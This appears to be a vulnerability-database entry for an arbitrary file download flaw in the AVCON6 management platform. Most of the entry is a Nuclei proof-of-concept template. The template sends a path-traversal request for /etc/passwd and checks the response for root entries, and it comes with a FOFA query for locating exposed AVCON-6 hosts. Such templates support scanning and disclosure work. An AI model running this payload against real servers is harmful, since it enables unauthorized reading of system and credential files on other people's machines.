avcon6-execl-lfi: AVCON6 org_execl_download.action - Arbitrary File Download

日期: 2025-08-01 | 影响软件: AVCON6 execl | POC: 已公开

漏洞描述

Arbitrary File Download vulnerability in the org_execl_download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server

PoC代码[已公开]

id: avcon6-execl-lfi

info:
  name: AVCON6 org_execl_download.action - Arbitrary File Download
  author: DhiyaneshDk
  severity: high
  description: |
    Arbitrary File Download vulnerability in the org_execl_download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="AVCON-6"
  tags: avcon6,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename="
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220414906a5718398526655b7f5e4599d9b5295b637b3c024195cf540211595c669022100871813d92af6dd39bae306b36db2910c5deaca0f23257282ef071bdff1364169:922c64590222798bb761d5b6d8e72950

相关漏洞推荐